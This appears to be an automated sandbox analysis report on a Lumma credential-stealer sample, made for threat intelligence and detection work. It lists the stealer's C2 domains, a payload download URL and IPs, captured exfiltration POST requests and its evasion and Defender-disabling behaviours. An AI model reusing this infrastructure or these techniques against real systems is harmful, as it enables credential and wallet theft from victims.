Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1544265
MD5:	6f748a450e7266ed42ec5c20759179b0
SHA1:	011fbd74c785121cfa2e00ba600815860af3a027
SHA256:	6938753b23ae29142838c0c10ffa02f9235b8915eecb4c6dbbaf9eb33bd464f5
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies windows update settings

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 2748 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6F748A450E7266ED42EC5C20759179B0)

ZXCELRXK9FXBC48TJDYH4AM8OTM.exe (PID: 5248 cmdline: "C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe" MD5: D730CAAD65AD7FD200196A21832C5371)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["fadehairucw.store", "thumbystriw.store", "necklacedmny.store", "crisiwarny.store", "presticitpo.store", "scriptyprefej.store", "founpiuer.store", "navygenerayk.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2243914715.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2244360588.0000000000C58000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2241532296.0000000000C45000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2241346372.0000000000C45000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2224940192.0000000000C45000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2243100835.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2242110728.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2241837316.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2243652288.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2244321003.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2242494146.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2242781558.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2243383940.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 2748	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: file.exe PID: 2748	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 2748	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 12 entries

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T06:59:09.856714+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49710	188.114.96.3	443	TCP
2024-10-29T06:59:11.040669+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49711	188.114.96.3	443	TCP
2024-10-29T06:59:23.007121+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49763	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T06:59:09.856714+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49710	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T06:59:11.040669+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49711	188.114.96.3	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T06:59:23.935727+0100	2019714	2	Potentially Bad Traffic	192.168.2.6	49769	185.215.113.16	80	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T06:59:18.042738+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49737	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: file.exe.2748.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["fadehairucw.store", "thumbystriw.store", "necklacedmny.store", "crisiwarny.store", "presticitpo.store", "scriptyprefej.store", "founpiuer.store", "navygenerayk.store"], "Build id": "4SD0y4--legendaryy"}

Multi AV Scanner detection for domain / URL

Source: necklacedmny.store

Virustotal: Detection: 11%

Perma Link

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 39%
Source: file.exe	Virustotal: Detection: 48%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String decryptor: scriptyprefej.store
Source: 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String decryptor: navygenerayk.store
Source: 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String decryptor: founpiuer.store
Source: 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String decryptor: necklacedmny.store
Source: 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String decryptor: thumbystriw.store
Source: 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String decryptor: fadehairucw.store
Source: 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String decryptor: crisiwarny.store
Source: 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String decryptor: presticitpo.store
Source: 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String decryptor: presticitpo.store
Source: 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 4SD0y4--legendaryy

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49763 version: TLS 1.2

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: ZXCELRXK9FXBC48TJDYH4AM8OTM.exe, 00000004.00000002.2499601402.0000000000E32000.00000040.00000001.01000000.00000006.sdmp, ZXCELRXK9FXBC48TJDYH4AM8OTM.exe, 00000004.00000003.2364907006.0000000005400000.00000004.00001000.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49737 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49711 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49763 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: fadehairucw.store
Source: Malware configuration extractor	URLs: thumbystriw.store
Source: Malware configuration extractor	URLs: necklacedmny.store
Source: Malware configuration extractor	URLs: crisiwarny.store
Source: Malware configuration extractor	URLs: presticitpo.store
Source: Malware configuration extractor	URLs: scriptyprefej.store
Source: Malware configuration extractor	URLs: founpiuer.store
Source: Malware configuration extractor	URLs: navygenerayk.store

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 29 Oct 2024 05:59:23 GMTContent-Type: application/octet-streamContent-Length: 2792448Last-Modified: Tue, 29 Oct 2024 05:55:51 GMTConnection: keep-aliveETag: "672078e7-2a9c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 38 09 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 7a 7a 66 72 6b 61 6d 00 40 2a 00 00 a0 00 00 00 3c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 70 67 76 74 6f 6f 74 00 20 00 00 00 e0 2a 00 00 04 00 00 00 76 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 7a 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49769 -> 185.215.113.16:80

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12864Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15110Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19968Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1244Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572511Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: global traffic

HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: global traffic	DNS traffic detected: DNS query: presticitpo.store
Source: global traffic	DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic	DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic	DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic	DNS traffic detected: DNS query: necklacedmny.store

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store

Source: file.exe, 00000000.00000002.2361476946.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000002.2363227484.0000000000C3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000002.2363227484.0000000000C3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exee
Source: file.exe, 00000000.00000003.2225245420.00000000052ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2225245420.00000000052ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2303438782.0000000000C35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: file.exe, 00000000.00000003.2225245420.00000000052ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2225245420.00000000052ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2225245420.00000000052ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2225245420.00000000052ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2225245420.00000000052ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2225245420.00000000052ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2225245420.00000000052ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2225245420.00000000052ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2225245420.00000000052ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2226542376.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000003.2226542376.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
